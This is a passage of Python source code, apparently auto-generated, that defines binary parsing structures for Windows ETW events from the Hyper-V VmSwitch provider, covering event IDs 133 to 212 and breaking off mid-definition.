@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=133, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_133_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ProcIndex" / Int32ul,
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=134, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_134_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ProcIndex" / Int32ul,
"VmqIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=135, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_135_0(Etw):
pattern = Struct(
"ProcIndex" / Int32ul,
"ProcUtil" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=136, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_136_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int32ul,
"ProcIndex" / Int32ul,
"QueueLoad" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=137, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_137_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int32ul,
"ProcIndex" / Int32ul,
"QueueLoad" / Int32ul,
"SafeThreshold" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=138, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_138_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"ProcIndex" / Int32ul,
"QueueLoad" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=139, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_139_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"ProcIndex" / Int32ul,
"QueueLoad" / Int32ul,
"SafeThreshold" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=140, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_140_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int32ul,
"ReceiveProcIndex" / Int32ul,
"SendProcIndex" / Int32ul,
"DestinationReceiveProcIndex" / Int32ul,
"DestinationSendProcIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=141, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_141_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"IsActivate" / Int32ul,
"VmqIndex" / Int32ul,
"ProcIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=142, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_142_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul,
"Status" / Int32ul,
"Flags" / Int32ul,
"BaseCpuNumber" / Int32ul,
"HashInformation" / Int32ul,
"IndirectionTableSize" / Int32ul,
"IndirectionTableOffset" / Int32ul,
"HashSecretKeySize" / Int32ul,
"HashSecretKeyOffset" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=143, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_143_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"BaseCpuNumber" / Int32ul,
"HashInformation" / Int32ul,
"IndirectionTableSize" / Int32ul,
"IndirectionTableOffset" / Int32ul,
"HashSecretKeySize" / Int32ul,
"HashSecretKeyOffset" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=144, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_144_0(Etw):
pattern = Struct(
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=145, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_145_0(Etw):
pattern = Struct(
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=146, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_146_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=147, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_147_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=148, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_148_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NdisOid" / Int32ul,
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=149, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_149_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NetEvent" / Int32ul,
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=150, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_150_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=151, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_151_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=152, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_152_0(Etw):
pattern = Struct(
"OldMember" / Guid,
"NewMember" / Guid
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=153, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_153_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=154, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_154_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=155, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_155_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=156, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_156_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=157, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_157_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Member" / Guid
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=158, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_158_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=159, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_159_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=160, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_160_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=161, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_161_0(Etw):
pattern = Struct(
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=162, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_162_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=163, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_163_0(Etw):
pattern = Struct(
"Aggregator" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=164, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_164_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=165, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_165_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"StatusBufferLen" / Int32ul,
"StatusBuffer" / Bytes(lambda this: this.StatusBufferLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=166, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_166_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Receiver" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=167, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_167_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Receiver" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=168, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_168_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=169, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_169_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Aggregator" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=170, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_170_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=171, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_171_0(Etw):
pattern = Struct(
"TeamNic" / Int64ul,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=173, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_173_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldAggregator" / Int64ul,
"NewAggregator" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=174, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_174_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=175, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_175_0(Etw):
pattern = Struct(
"Member" / Guid,
"Status" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=176, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_176_0(Etw):
pattern = Struct(
"Member" / Guid,
"BufferLen" / Int32ul,
"Buffer" / Bytes(lambda this: this.BufferLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=177, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_177_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldState" / Int32ul,
"NewState" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=178, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_178_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldState" / Int32ul,
"NewState" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=179, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_179_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldState" / Int32ul,
"NewState" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=180, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_180_0(Etw):
pattern = Struct(
"Member" / Guid,
"BufferLen" / Int32ul,
"Buffer" / Bytes(lambda this: this.BufferLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=181, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_181_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldAggregator" / Int64ul,
"NewAggregator" / Int64ul,
"Ready" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=182, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_182_0(Etw):
pattern = Struct(
"Member" / Guid,
"OldAggregator" / Int64ul,
"NewAggregator" / Int64ul,
"Ready" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=183, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_183_0(Etw):
pattern = Struct(
"Member" / Guid,
"ChurnType" / Int32sl,
"OldState" / Int32sl,
"NewState" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=184, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_184_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=185, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_185_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=186, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_186_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=187, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_187_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=188, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_188_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=189, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_189_0(Etw):
pattern = Struct(
"DriverObject" / WString,
"Member" / WString
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=190, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_190_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=191, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_191_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=192, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_192_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=193, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_193_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=194, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_194_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"FailureCode" / Int32ul,
"FailureReason" / Int32ul,
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=195, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_195_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"FailureCode" / Int32ul,
"FailureReason" / Int32ul,
"Ext1" / Int32ul,
"HeaderType" / Int32ul,
"HeaderRevision" / Int32ul,
"HeaderSize" / Int32ul,
"ExtensionId" / Guid,
"FeatureId" / Guid,
"SaveDataSize" / Int32ul,
"SaveDataSizeOverflow" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=196, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_196_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul,
"FailureCode" / Int32ul,
"FailureReason" / Int32ul,
"Ext1" / Int32ul,
"HeaderType" / Int32ul,
"HeaderRevision" / Int32ul,
"HeaderSize" / Int32ul,
"ExtensionId" / Guid,
"FeatureId" / Guid,
"SaveDataSize" / Int32ul,
"SaveDataSizeOverflow" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=197, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_197_0(Etw):
pattern = Struct(
"VlanID" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=198, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_198_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=199, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_199_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=200, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_200_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=201, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_201_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=202, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_202_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=203, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_203_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=204, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_204_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"vPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul,
"DstVPortId" / Int32ul,
"VlanId" / Int32ul,
"MacLength" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacLength)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=205, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_205_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"SrcVPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul,
"DstVPortId" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=206, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_206_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=207, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_207_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=208, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_208_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=209, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_209_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=210, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_210_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=211, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_211_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"TeamingMode" / Int32ul,
"LoadBalancingAlgorithm" / Int32ul,
"VmqSumOfQueues" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=212, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_212_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
